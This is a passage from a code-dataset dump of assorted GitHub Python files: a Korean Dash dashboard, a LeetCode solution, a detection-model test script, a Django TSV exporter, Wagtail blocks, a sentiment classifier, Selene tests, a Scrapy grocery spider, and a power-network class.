style={'width': '55%', 'margin-top': '10px', 'margin-left': '10px'}),\n dcc.Graph(id='pie-chart')], style={'border': '1px solid #f9f9f9', 'width': '500px'})])], id='first-part'),\n\n html.Div([html.Div([html.P(id='wordcloud-chart-country'),\n html.H5('정부지원사업 워드 클라우드', className='chart-text-right-part')], className='chart-text'),\n html.Div([html.Img(id='wordcloud')], id='wordcloud-part')],\n id='second-part'),\n\n\n html.Div([html.Div([html.P(id='scatter-chart-country'),\n html.H5('정부지원사업 산점도', 
className='chart-text-right-part')], className='chart-text', id='scatter-part-text'),\n dcc.Graph(\n id='scatter-chart'),\n html.Div([html.Div([\n html.P(\n 'Selection Data'),\n html.H5('산점도에서 선택한 데이터가 보여집니다.', className='chart-text-right-part')], className='chart-text'),\n html.Div(id='selected-data')], id='scatter-selected-box')], id='third-part')\n ]),\n html.Footer()])\n\n\n# callback functions\n@app.callback(\n # get country data and pie chart value and deliver to pie chart, wordcloud and scatter\n [Output('pie-chart-country', 'children'),\n Output('pie-chart-value', 'children'),\n Output('pie-chart', 'figure'),\n Output('wordcloud-chart-country', 'children'),\n Output('wordcloud', 'src'),\n Output('scatter-chart-country', 'children'),\n Output('scatter-chart', 'figure')],\n [Input('korea-map', 'selectedData'),\n Input('pie-labels', 'value')])\ndef draw_all_chart(selectedData, value):\n if value == None:\n value = INITIAL_CHART\n\n if selectedData == None or selectedData['points'] == []:\n selectedData = '전체'\n else:\n selectedData = selectedData['points'][0]['hovertext']\n\n # wordcloud image source, loading time is too long, have to fix it\n img_src = 'https://raw.githubusercontent.com/bin7665/KNU-20201-team2-BizBot/master/file/' + \\\n selectedData + '.png'\n\n return (selectedData + ' 지역', '정부지원사업 ' + pie_charts[value]['name'], get_pie_chart(selectedData, pie_projects[selectedData][value]),\n selectedData + ' 지역', img_src, selectedData + ' 지역', get_scatter_chart(selectedData, scatter_projects[selectedData]))\n\n\n@app.callback(\n # get country data and selected datas in scatter and deliver to selected data box\n Output('selected-data', 'children'),\n [Input('korea-map', 'selectedData'),\n Input('scatter-chart', 'selectedData')])\ndef display_selected_data(mapData, selectedData):\n data_indexs = []\n if mapData == None or mapData['points'] == []:\n mapData = '전체'\n else:\n mapData = mapData['points'][0]['hovertext']\n\n if selectedData != None:\n for sel in selectedData['points']:\n data_indexs.append(sel['customdata'][1])\n\n return selected_data_box(data_indexs)\n\n\n# run dash server\nif __name__ == '__main__':\n app.run_server(debug=True)\n","repo_name":"bin7665/KNU-20201-team2-BizBot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":12110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37218991121","text":"class Solution:\n def alertNames(self, keyName: 'List[str]', keyTime: 'List[str]') -> 'List[str]':\n hmp = {}\n for i in range(len(keyName)):\n if keyName[i] not in hmp:\n hmp[keyName[i]] = []\n hmp[keyName[i]].append(keyTime[i])\n output = []\n for k, v in hmp.items():\n if len(v) >= 3:\n arr = sorted(v)\n for i in range(2, len(arr)):\n if arr[i][:2] == arr[i - 2][:2]: # same hour\n output.append(k)\n break\n elif int(arr[i][:2]) <= int(arr[i - 2][:2]) + 1 and int(arr[i][-2:]) <= int(arr[i - 2][-2:]):\n output.append(k)\n break\n return sorted(output)\n\n","repo_name":"renjieliu/leetcode","sub_path":"1500_1999/1604.py","file_name":"1604.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"70140014132","text":"\"\"\"Perform inference on one or more datasets.\"\"\"\n\nimport argparse\nimport cv2\nimport os\nimport pprint\nimport sys\nimport time\n\nimport torch\n\n# import tools._init_paths\nimport _init_paths # pylint: disable=unused-import\nfrom core.config import cfg, 
merge_cfg_from_file, merge_cfg_from_list, assert_and_infer_cfg\nfrom core.test_engine import run_inference\nimport utils.logging\n\n# OpenCL may be enabled by default in OpenCV3; disable it because it's not\n# thread safe and causes unwanted GPU memory allocations.\ncv2.ocl.setUseOpenCL(False)\n\n\ndef parse_args():\n parser = argparse.ArgumentParser()\n parser.add_argument(\n '--dataset', default=\"\",\n help='training dataset')\n parser.add_argument(\n '--cfg', dest='cfg_file', required=True,\n help='optional config file')\n parser.add_argument(\n '--load_ckpt', required=True,\n help='path of checkpoint to load')\n parser.add_argument(\n '--load_detectron', help='path to the detectron weight pickle file')\n\n parser.add_argument(\n '--output_dir',\n help='output directory to save the testing results. If not provided, '\n 'defaults to [args.load_ckpt|args.load_detectron]/../test.')\n\n parser.add_argument(\n '--set', dest='set_cfgs',\n help='set config keys, will overwrite config in the cfg_file.'\n ' See lib/core/config.py for all options',\n default=[], nargs='*')\n\n parser.add_argument(\n '--range',\n help='start (inclusive) and end (exclusive) indices',\n type=int, nargs=2)\n parser.add_argument(\n '--multi_gpu_testing', help='using multiple gpus for inference',\n action='store_true')\n parser.add_argument(\n '--vis', dest='vis', help='visualize detections', action='store_true')\n\n return parser.parse_args()\n\nfrom pycocotools.coco import COCO\nfrom pycocotools.cocoeval import COCOeval \nimport numpy as np\nclass BoxEvaluator(object):\n def __init__(self, dataset_json, preds_json):\n self.dataset = COCO(dataset_json)\n self.object_classes = [v['name'] for v in self.dataset.loadCats(self.dataset.getCatIds())]\n self.preds = self.dataset.loadRes(preds_json)\n self.coco_eval = COCOeval(self.dataset, self.preds, 'bbox')\n self.coco_eval.params.iouThrs = np.asarray([0.25, 0.5, 0.75])\n\n def evaluate(self):\n mAP = dict()\n my_cls_ap = dict()\n self.coco_eval.evaluate()\n self.coco_eval.accumulate()\n for thr_ind, thr in enumerate(self.coco_eval.params.iouThrs):\n ap_by_class = []\n for cls_ind, cls_name in enumerate(self.object_classes):\n cls_precision = self.coco_eval.eval['precision'][thr_ind, :, cls_ind, 0, -1]\n cls_ap = np.mean(cls_precision[cls_precision > -1])\n ap_by_class.append(cls_ap)\n mAP['%.2f' % thr] = np.asarray(ap_by_class).mean()\n my_cls_ap['%.2f' % thr] = ap_by_class\n return mAP, my_cls_ap\n\nif __name__ == '__main__':\n\n if not torch.cuda.is_available():\n sys.exit(\"Need a CUDA device to run the code.\")\n\n logger = utils.logging.setup_logging(__name__)\n args = parse_args()\n logger.info('Called with args:')\n logger.info(args)\n\n # assert (torch.cuda.device_count() == 1) ^ bool(args.multi_gpu_testing) # multi-gpu-testing?\n if torch.cuda.device_count() == 1:\n print(\"single GPU\")\n args.multi_gpu_testing = False\n else:\n print(\"multi GPU\")\n args.multi_gpu_testing = True\n\n assert bool(args.load_ckpt) ^ bool(args.load_detectron), \\\n 'Exactly one of --load_ckpt and --load_detectron should be specified.'\n if args.output_dir is None:\n ckpt_path = args.load_ckpt if args.load_ckpt else args.load_detectron\n if 'train' in args.dataset:\n args.output_dir = os.path.join(\n os.path.dirname(os.path.dirname(ckpt_path)), 'trainaug',\n os.path.basename(ckpt_path).split('.')[0])\n else:\n args.output_dir = os.path.join(\n os.path.dirname(os.path.dirname(ckpt_path)), 'test',\n os.path.basename(ckpt_path).split('.')[0])\n logger.info('Automatically set output 
directory to %s', args.output_dir)\n if not os.path.exists(args.output_dir):\n os.makedirs(args.output_dir)\n\n cfg.VIS = args.vis\n\n if args.cfg_file is not None:\n merge_cfg_from_file(args.cfg_file)\n if args.set_cfgs is not None:\n merge_cfg_from_list(args.set_cfgs)\n\n if args.dataset == \"coco2017val\":\n cfg.TEST.DATASETS = ('coco_2017_val',)\n cfg.MODEL.NUM_CLASSES = 80\n elif args.dataset == \"coco2017test\":\n cfg.TEST.DATASETS = ('coco_2017_test-dev',)\n cfg.MODEL.NUM_CLASSES = 80\n elif args.dataset == \"coco2017train\":\n cfg.TEST.DATASETS = ('coco_2017_train',)\n cfg.MODEL.NUM_CLASSES = 80\n cfg.TEST.PROPOSAL_FILES = cfg.TRAIN.PROPOSAL_FILES\n elif args.dataset == 'voc2012sbdval':\n cfg.TEST.DATASETS = ('voc_2012_sbdval',)\n cfg.MODEL.NUM_CLASSES = 20\n elif args.dataset == 'voc2012trainaug':\n cfg.TEST.DATASETS = ('voc_2012_trainaug',)\n cfg.MODEL.NUM_CLASSES = 20\n cfg.TEST.PROPOSAL_FILES = cfg.TRAIN.PROPOSAL_FILES\n else: # For subprocess call\n assert cfg.TEST.DATASETS, 'cfg.TEST.DATASETS shouldn\\'t be empty'\n assert_and_infer_cfg()\n\n logger.info('Testing with config:')\n logger.info(pprint.pformat(cfg))\n\n # For test_engine.multi_gpu_test_net_on_dataset\n args.test_net_file, _ = os.path.splitext(__file__)\n # manually set args.cuda\n args.cuda = True\n\n if args.load_ckpt:\n while not os.path.exists(args.load_ckpt):\n logger.info('Waiting for {} to exist...'.format(args.load_ckpt))\n time.sleep(10)\n if args.load_detectron:\n while not os.path.exists(args.load_detectron):\n logger.info('Waiting for {} to exist...'.format(args.load_detectron))\n time.sleep(10)\n\n run_inference(\n args,\n ind_range=args.range,\n multi_gpu_testing=args.multi_gpu_testing,\n check_expected_results=True,flag=cfg.transform_mode)","repo_name":"ZechengLi19/CIM","sub_path":"tools/test_net.py","file_name":"test_net.py","file_ext":"py","file_size_in_byte":6186,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"21"} +{"seq_id":"41880123416","text":"from factual.models import Work, Hero, Response\nimport re\n\nWORK_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda work : 'work_' + str(work.id),\n },{\n 'name': 'title',\n 'func': lambda work: work.title,\n },{\n 'name': 'author',\n 'func': lambda work: work.author,\n },{\n 'name': 'medium',\n 'func': lambda work: work.medium,\n },{\n 'name': 'publication year',\n 'func': lambda work: work.pub_year,\n },{\n 'name': 'publication country',\n 'func': lambda work: work.pub_country,\n },{\n 'name': 'source or adaptation',\n 'func': lambda work: 'source' if work.is_source else 'adaptation'\n },{\n 'name': 'adaptation of',\n 'func': lambda work: work.adaptation_of,\n },{\n 'name': 'adaptation of (index)',\n 'func': lambda work: work.adaptation_of.id if work.adaptation_of else ''\n },{\n 'name': 'environment',\n 'func': lambda work: work.environment,\n },{\n 'name': 'number of heroes',\n 'func': lambda work: len(work.heroes.all()),\n },{\n 'name': 'number of responses',\n 'func': lambda work: len(work.responses.all()),\n }]\n\nrelative_format = {\n 'PARENTS_PRESENT': 'parents (present)',\n 'PARENTS_ABSENT': 'parents (absent)',\n 'SIBLINGS_PRESENT': 'siblings (present)',\n 'SIBLINGS_ABSENT': 'siblings (absent)',\n 'UNKNOWN': 'unknown',\n 'NONE': 'none',\n }\n\nHERO_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda hero: 'hero_' + str(hero.id)\n },{\n 'name': 'name',\n 'func': lambda hero: hero.name\n },{\n 'name': 'role',\n 'func': lambda hero: hero.get_role_display(),\n },{\n 'name': 'is narrator',\n 'func': 
lambda hero: hero.narrator,\n },{\n 'name': 'is focaliser',\n 'func': lambda hero: hero.focaliser,\n },{\n 'name': 'gender',\n 'func': lambda hero: hero.get_gender_display()\n },{\n 'name': 'age',\n 'func': lambda hero: hero.age,\n },{\n 'name': 'country (origin)',\n 'func': lambda hero: hero.country_origin,\n },{\n 'name': 'country (growing up)',\n 'func': lambda hero: hero.country_growup,\n },{\n 'name': 'country (living)',\n 'func': lambda hero: hero.country_live,\n },{\n 'name': 'hobbies',\n 'func': lambda hero: ', '.join(hero.hobbies),\n },{\n 'name': 'pets',\n 'func': lambda hero: ', '.join(hero.pets),\n },{\n 'name': 'education',\n 'func': lambda hero: hero.get_education_display(),\n },{\n 'name': 'profession',\n 'func': lambda hero: hero.get_profession_display(),\n },{\n 'name': 'considered beautiful',\n 'func': lambda hero: hero.appearance,\n },{\n 'name': 'sexual relations described',\n 'func': lambda hero: hero.sex,\n },{\n 'name': 'relatives',\n 'func': lambda hero: ', '.join(relative_format[relative] for relative in hero.relatives)\n },{\n 'name': 'wealth',\n 'func': lambda hero: hero.get_wealth_display(),\n },{\n 'name': 'problems',\n 'func': lambda hero: ', '.join(hero.problems),\n },{\n 'name': 'solutions',\n 'func': lambda hero: ', '.join(hero.solutions),\n },{\n 'name': 'number of responses',\n 'func': lambda hero: len(hero.responses.all()),\n }]\n\n\nRESPONSE_FIELDS = [\n {\n 'name': 'index',\n 'func': lambda response: 'response_' + str(response.id)\n },{\n 'name': 'gender',\n 'func': lambda response: response.responses.get('participant_gender', None),\n },{\n 'name': 'age',\n 'func': lambda response: response.responses.get('participant_age', None),\n },{\n 'name': 'nationality',\n 'func': lambda response: response.responses.get('participant_nationality', None),\n },{\n 'name': 'identification: personality',\n 'func': lambda response: response.responses['identification_personality'],\n },{\n 'name': 'identification: intruiging',\n 'func': lambda response: response.responses['identification_intruiging'],\n },{\n 'name': 'identification: wish to be like',\n 'func': lambda response: response.responses['identification_wishbelike'],\n },{\n 'name': 'appearance: beautiful',\n 'func': lambda response: response.responses['appearance_beautiful'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: wish to look like',\n 'func': lambda response: response.responses['appearance_wishlookedlike'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: influence feelings',\n 'func': lambda response: response.responses['appearance_influencefeelings'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: impact',\n 'func': lambda response: response.responses['appearance_impact'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'appearance: aware',\n 'func': lambda response: response.responses['appearance_aware'] if response.responses['appearance_enable'] else '',\n },{\n 'name': 'gender: defines personality',\n 'func': lambda response: response.responses['gender_definespersonality'],\n },{\n 'name': 'gender: embraces',\n 'func': lambda response: response.responses['gender_embraces'],\n },{\n 'name': 'gender: attempts expectations',\n 'func': lambda response: response.responses['gender_attempts_expectations'],\n },{\n 'name': 'gender: struggles expectations',\n 'func': lambda response: response.responses['gender_struggles_expectations'],\n },{\n 'name': 'agency: responsible',\n 'func': lambda 
response: response.responses['agency_responsible'],\n },{\n 'name': 'agency: independent',\n 'func': lambda response: response.responses['agency_independent'],\n },{\n 'name': 'agency: hindered',\n 'func': lambda response: response.responses['agency_hindered'],\n },{\n 'name': 'agency: environment',\n 'func': lambda response: response.responses['agency_environment'],\n },{\n 'name': 'agency: development',\n 'func': lambda response: response.responses['agency_development'],\n },{\n 'name': 'profession: relevant to personality',\n 'func': lambda response: response.responses['profession_relevant_to_personality'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: social status',\n 'func': lambda response: response.responses['profession_social_status'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: growth',\n 'func': lambda response: response.responses['profession_growth'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'profession: defines life',\n 'func': lambda response: response.responses['profession_defines_life'] if response.responses['profession_enable'] else '',\n },{\n 'name': 'personality: assertive',\n 'func': lambda response: response.responses['personality_assertive'],\n },{\n 'name': 'personality: independent',\n 'func': lambda response: response.responses['personality_independent'],\n },{\n 'name': 'personality: vain',\n 'func': lambda response: response.responses['personality_vain'],\n },{\n 'name': 'personality: confident',\n 'func': lambda response: response.responses['personality_confident'],\n },{\n 'name': 'personality: well-rounded',\n 'func': lambda response: response.responses['personality_wellrounded'],\n },{\n 'name': 'personality: honest',\n 'func': lambda response: response.responses['personality_honest'],\n },{\n 'name': 'personality: loyal',\n 'func': lambda response: response.responses['personality_loyal'],\n },{\n 'name': 'personality: cooperative',\n 'func': lambda response: response.responses['personality_cooperative'],\n },\n ]\n\ndef format_tsv(lines):\n format = lambda item: re.sub(r'\\s+', ' ', str(item))\n formatted = '\\n'.join(\n ['\\t'.join(format(item) for item in line) for line in lines]\n )\n return formatted\n\ndef download_works():\n header = [field['name'] for field in WORK_FIELDS]\n lines = [header]\n\n works = Work.objects.all()\n for work in works:\n items = [field['func'](work) for field in WORK_FIELDS]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n\ndef download_heroes():\n work_fields = ['work: ' + field['name'] for field in WORK_FIELDS]\n hero_fields = [field['name'] for field in HERO_FIELDS]\n header = hero_fields[:2] + work_fields + hero_fields[2:]\n lines = [header]\n\n heroes = Hero.objects.all()\n for hero in heroes:\n work_items = [field['func'](hero.work) for field in WORK_FIELDS]\n items = [field['func'](hero) for field in HERO_FIELDS]\n items = items[:2] + work_items + items[2:]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n\ndef download_responses():\n work_fields = ['work: ' + field['name'] for field in WORK_FIELDS]\n hero_fields = [field['name'] for field in HERO_FIELDS]\n response_fields = [field['name'] for field in RESPONSE_FIELDS]\n header = response_fields[:1] + work_fields + hero_fields + response_fields[1:]\n lines = [header]\n\n responses = Response.objects.all()\n for response in responses:\n work_items = [field['func'](response.work) for field in WORK_FIELDS]\n hero_items = 
[field['func'](response.hero) for field in HERO_FIELDS]\n items = [field['func'](response) for field in RESPONSE_FIELDS]\n items = items[:1] + work_items + hero_items + items[1:]\n lines.append(items)\n\n data = format_tsv(lines)\n return data\n","repo_name":"UUDigitalHumanitieslab/Map-your-Heroine","sub_path":"backend/factual/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":9937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"28536816977","text":"from wagtail.core import blocks\nfrom wagtail.images.blocks import ImageChooserBlock\n\nclass BannerImageAndTextBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True, help_text='Add your title')\n image = ImageChooserBlock(required=True)\n\n\n class Meta:\n template = \"blocks/AboutUsBanner.html\"\n icon = \"edit\"\n label = \"Title & Image Banner\"\n\nclass SimpleRichtextBlock(blocks.RichTextBlock):\n\n def __init__(self, required=True, help_text=None, editor='default', features=None, validators=(), **kwargs):\n super().__init__(**kwargs)\n self.features = [\n \"bold\",\n \"italic\",\n \"link\",\n ]\n\n class Meta:\n template = \"blocks/richtext_block.html\"\n icon = \"edit\"\n label = \"Simple Richtext\"\n\nclass CardsBlock(blocks.StructBlock):\n title = blocks.CharBlock(required=True , help_text=\"Add your title\")\n cards = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"image\",ImageChooserBlock(required=True)),\n (\"title\",blocks.CharBlock(required=True,max_length=40)),\n (\"text\",blocks.TextBlock(required=True)),\n (\"url_button\",blocks.URLBlock(required=False))\n ]\n )\n )\n\n class Meta:\n template = \"blocks/card_block.html\"\n icon=\"placeholder\"\n label=\"Cards\"\n\nclass DropDownBlock(blocks.StructBlock):\n # link_title = blocks.CharBlock(blank=True,null=True,max_length=50)\n drop_down = blocks.ListBlock(\n blocks.StructBlock(\n [\n (\"link_title\",blocks.CharBlock(required=True,max_length=40)),\n (\"link_page\",blocks.PageChooserBlock(required=False)),\n ]\n )\n )\n # open_in_new_tab = models.BooleanField(default=False,blank=True,)\n\n class Meta:\n template = \"blocks/drop_down_block.html\"\n icon=\"placeholder\"\n label=\"Drop Down\"","repo_name":"Mohammad-Abdul-Ghafour/wagtail_template","sub_path":"blocks/blocks.py","file_name":"blocks.py","file_ext":"py","file_size_in_byte":1933,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"16232348093","text":"# -*- coding: UTF-8 -*-\nimport argparse\nimport pandas as pd\nimport string\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.linear_model import LogisticRegression\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--dataset',\n default='output.csv',\n help='XXXX.json, XXXX is the file')\n args = parser.parse_args()\n\n print('start processing data')\n # Data Processing\n input_data = pd.read_csv(args.dataset)\n input_data['overall'] = input_data['overall'].astype(object) # fix datatype error\n input_data['reviewText'] = input_data['reviewText'].astype(object) # fix datatype error\n \n dataset = {'reviewText': input_data['reviewText'], 'overall': input_data['overall']}\n dataset = pd.DataFrame(data = dataset)\n dataset = dataset.dropna() # ignore if any row contained NaN\n dataset = dataset[dataset['overall'] != '3']\n dataset['label'] = dataset['overall'].apply(lambda rating : +1 if str(rating) > '3' 
else -1)\n\n # Splitting data into training set and testing set\n X = pd.DataFrame(dataset, columns = ['reviewText'])\n y = pd.DataFrame(dataset, columns = ['label'])\n train_X, test_X, trian_y, test_y = train_test_split(X, y, random_state=50)\n\n # Bag of Words model\n vectorizer = CountVectorizer(token_pattern=r'\\b\\w+\\b')\n train_vector = vectorizer.fit_transform(train_X['reviewText'])\n test_vector = vectorizer.transform(test_X['reviewText'])\n print('processing ... ok')\n print('start training model')\n # LogisticRegression model for classification problems\n clr = LogisticRegression()\n clr.fit(train_vector, trian_y.values.ravel())\n scores = clr.score(test_vector, test_y) # accracy\n print('training ...ok')\n print('accuracy: {}%'.format(scores*100))\n","repo_name":"Amber0914/NLP-Text_Classification","sub_path":"text_classification.py","file_name":"text_classification.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"43057149147","text":"from selenium import webdriver\n\nfrom selene import config\nfrom selene.common.none_object import NoneObject\nfrom selene.driver import SeleneDriver\nfrom tests.acceptance.helpers.helper import get_test_driver\nfrom tests.integration.helpers.givenpage import GivenPage\n\n__author__ = 'yashaka'\n\ndriver = NoneObject('driver') # type: SeleneDriver\nGIVEN_PAGE = NoneObject('GivenPage') # type: GivenPage\nWHEN = GIVEN_PAGE # type: GivenPage\noriginal_timeout = config.timeout\n\n\ndef setup_module(m):\n global driver\n driver = SeleneDriver.wrap(get_test_driver())\n global GIVEN_PAGE\n GIVEN_PAGE = GivenPage(driver)\n global WHEN\n WHEN = GIVEN_PAGE\n\n\ndef teardown_module(m):\n driver.quit()\n\n\ndef setup_function(fn):\n global original_timeout\n config.timeout = original_timeout\n\n\ndef test_search_is_lazy_and_does_not_start_on_creation_for_both_parent_and_inner():\n GIVEN_PAGE.opened_empty()\n non_existent_element = driver.element('#not-existing-element').element('.not-existing-inner')\n assert str(non_existent_element)\n\n\ndef test_search_is_postponed_until_actual_action_like_questioning_displayed():\n GIVEN_PAGE.opened_empty()\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n
<h1 id=\"will-be-existing-element\">\n            <span class=\"will-exist-inner\">Hello kitty:*</span>\n        </h1>
''')\n assert element.is_displayed() is True\n\n\ndef test_search_is_updated_on_next_actual_action_like_questioning_displayed():\n GIVEN_PAGE.opened_empty()\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n
<h1 id=\"will-be-existing-element\">\n            <span class=\"will-exist-inner\">Hello kitty:*</span>\n        </h1>
''')\n assert element.is_displayed() is True\n\n element = driver.element('#will-be-existing-element').element('.will-exist-inner')\n WHEN.load_body('''\n
<h1 id=\"will-be-existing-element\">\n            <span class=\"will-exist-inner\" style=\"display:none\">Hello kitty:*</span>\n        </h1>
''')\n    assert element.is_displayed() is False\n\n\ndef test_search_finds_exactly_inside_parent():\n    GIVEN_PAGE.opened_with_body('''\n        <a href=\"#first\">go to Heading 2</a>\n        <p>\n            <a href=\"#second\">go to Heading 2</a>\n            <h1 id=\"first\">Heading 1</h1>\n            <h2 id=\"second\">Heading 2</h2>
\n /p>''')\n\n driver.element('p').element('a').click()\n assert (\"second\" in driver.current_url) is True\n","repo_name":"vkpro-forks/selene","sub_path":"tests/integration/inner_selement_lazy_search_test.py","file_name":"inner_selement_lazy_search_test.py","file_ext":"py","file_size_in_byte":2510,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6768451968","text":"import scrapy\n\nclass EcommerceSpider(scrapy.Spider):\n name = 'ecommerce_spider'\n start_urls = ['https://www.spinneyslebanon.com/default/alcohol.html',\n 'https://www.spinneyslebanon.com/default/beverages.html',\n 'https://www.spinneyslebanon.com/default/bakery.html',\n 'https://www.spinneyslebanon.com/default/deli-dairy-eggs.html',\n 'https://www.spinneyslebanon.com/default/fruits-vegetables.html',\n 'https://www.spinneyslebanon.com/default/meat-seafood.html',\n 'https://www.spinneyslebanon.com/default/frozen.html',\n 'https://www.spinneyslebanon.com/default/food-cupboard.html'] # Replace with the actual URL of the product listing page\n\n def parse(self, response):\n # Extract the product URLs from the listing page\n product_urls = response.css(\".product-item-info\").css(\"::attr(href)\").re(\".*.html\")\n\n # Follow each product URL and extract fields\n for url in product_urls:\n yield scrapy.Request(url, callback=self.parse_product)\n\n # Follow pagination links if available\n next_page_url = response.css('.next::attr(href)').get()\n if next_page_url:\n yield scrapy.Request(next_page_url, callback=self.parse)\n\n def parse_product(self, response):\n # Extract fields from the product page\n title = response.css('.base::text').get()\n price = response.css('.price::text').get()\n description = response.css('div.value::text').get()\n image_url = response.css(\".imgzoom::attr(data-zoom)\").get()\n brand = response.css(\"span.prod_brand a ::text\").get()\n quantity = response.css(\"span.prod_brand ::text\").get() + \" \" + response.css(\"span.prod_weight::text\").get()\n about_the_brand = response.css(\"span.brand_base_text ::text\").get()\n # nutritional_facts = response.css('div.nutritionalFacts#nutritionalFacts::text').get()\n\n # Process or store the extracted data as needed\n yield {\n 'title': title,\n 'price': price,\n 'description': description,\n 'image_url' : image_url,\n 'quantity':quantity,\n 'brand':brand,\n 'about_the_brand':about_the_brand\n }\n","repo_name":"omtarful/spinneys-chatbot","sub_path":"spinneys-alcohol-spider/spinneys-spider.py","file_name":"spinneys-spider.py","file_ext":"py","file_size_in_byte":2294,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42121419107","text":"from relsad.network.components import Bus, Line\nfrom relsad.Time import Time, TimeStamp, TimeUnit\nfrom relsad.utils import INF, eq, unique\n\nfrom .Transmission import Transmission\n\n\nclass SubSystem:\n \"\"\"Class defining a sub system network type\n ...\n\n Attributes\n ----------\n name : str\n Name of the sub system\n slack : Bus\n The system slack bus, used for power flow calculations\n buses : list\n List of all buses in the sub system\n ev_parks : list\n List of all EV parks in the sub system\n batteries : list\n List of all batteries in the sub system\n production : list\n List of all generation units in the sub system\n lines : list\n List of all lines in the sub system\n sensors : list\n List of all sensors in the sub system\n circuitbreaker : list\n List of all circuit breakers in the sub system\n 
disconnectors : list\n List of all disconnectors in the sub system\n intelligent_switch : list\n List of all intelligent switches in the sub system\n comp_list : list\n List containing the components in the sub system\n comp_dict : dict\n Dictionary containing the components in the sub system\n child_network_list : list\n List containing the child networks to the sub system\n\n\n Methods\n ----------\n add_bus(bus)\n Adding a bus including elements on the bus (battery, generation unit, EV park) to the sub system\n add_buses(buses)\n Adding buses to the sub system\n add_line(Line)\n Adding a line including elements on the line (sensor, circuit breaker, disconnector) to the sub system\n add_lines(lines)\n Adding lines to the sub system\n add_cild_network(network)\n Adding child network to the sub system\n get_system_load_balance()\n Returns the load balance of the system\n update_batteries(fail_duration, dt)\n Updates the batteries in the sub system\n update_ev_parks(fail_duration, dt, start_time, curr_time)\n Updates the EV parks in the sub system\n reset_load_flow_data()\n Reset the variables used in the load flow analysis\n\n \"\"\"\n\n ## Visual attributes\n color = \"black\"\n\n ## Counter\n counter = 0\n\n def __init__(self):\n # Info\n SubSystem.counter += 1\n self.name = \"ps{:d}\".format(SubSystem.counter)\n # Load flow\n self.slack = None\n # Components\n self.buses = list()\n self.ev_parks = list()\n self.batteries = list()\n self.productions = list()\n self.lines = list()\n self.sensors = list()\n self.intelligent_switch = list()\n self.circuitbreakers = list()\n self.disconnectors = list()\n self.comp_list = list()\n self.comp_dict = dict()\n ## Child networks\n self.child_network_list: list = list()\n\n def __str__(self):\n return self.name\n\n def __repr__(self):\n return f\"SubSystem(name={self.name})\"\n\n def __eq__(self, other):\n if hasattr(other, \"buses\") and hasattr(other, \"lines\"):\n return set(unique(self.buses + self.lines)) == set(\n unique(other.buses + other.lines)\n )\n else:\n return False\n\n def __hash__(self):\n return hash(self.name)\n\n def add_bus(self, bus: Bus):\n \"\"\"\n Adding a bus including elements on the bus (battery, generation unit, EV park) to the sub system\n\n Parameters\n ----------\n bus : Bus\n A bus element\n\n Returns\n ----------\n None\n\n \"\"\"\n self.comp_dict[bus.name] = bus\n self.comp_list.append(bus)\n self.buses.append(bus)\n self.buses = unique(self.buses)\n if bus.ev_park is not None:\n self.comp_dict[bus.ev_park.name] = bus.ev_park\n self.comp_list.append(bus.ev_park)\n self.ev_parks.append(bus.ev_park)\n self.ev_parks = unique(self.ev_parks)\n if bus.battery is not None:\n self.comp_dict[bus.battery.name] = bus.battery\n self.comp_list.append(bus.battery)\n self.batteries.append(bus.battery)\n self.batteries = unique(self.batteries)\n if bus.prod is not None:\n self.comp_dict[bus.prod.name] = bus.prod\n self.comp_list.append(bus.prod)\n self.productions.append(bus.prod)\n self.productions = unique(self.productions)\n self.comp_list = unique(self.comp_list)\n\n def add_buses(self, buses: list):\n \"\"\"Adding buses to the sub system\n\n Parameters\n ----------\n buses : list\n A list of Bus elements in the sub system\n\n Returns\n ----------\n None\n\n \"\"\"\n for bus in buses:\n self.add_bus(bus)\n\n def add_line(self, line: Line):\n \"\"\"\n Adding a line including elements on the line (sensor, circuit breaker, disconnector) to the sub system\n\n Parameters\n ----------\n line : Line\n A line element\n\n Returns\n 
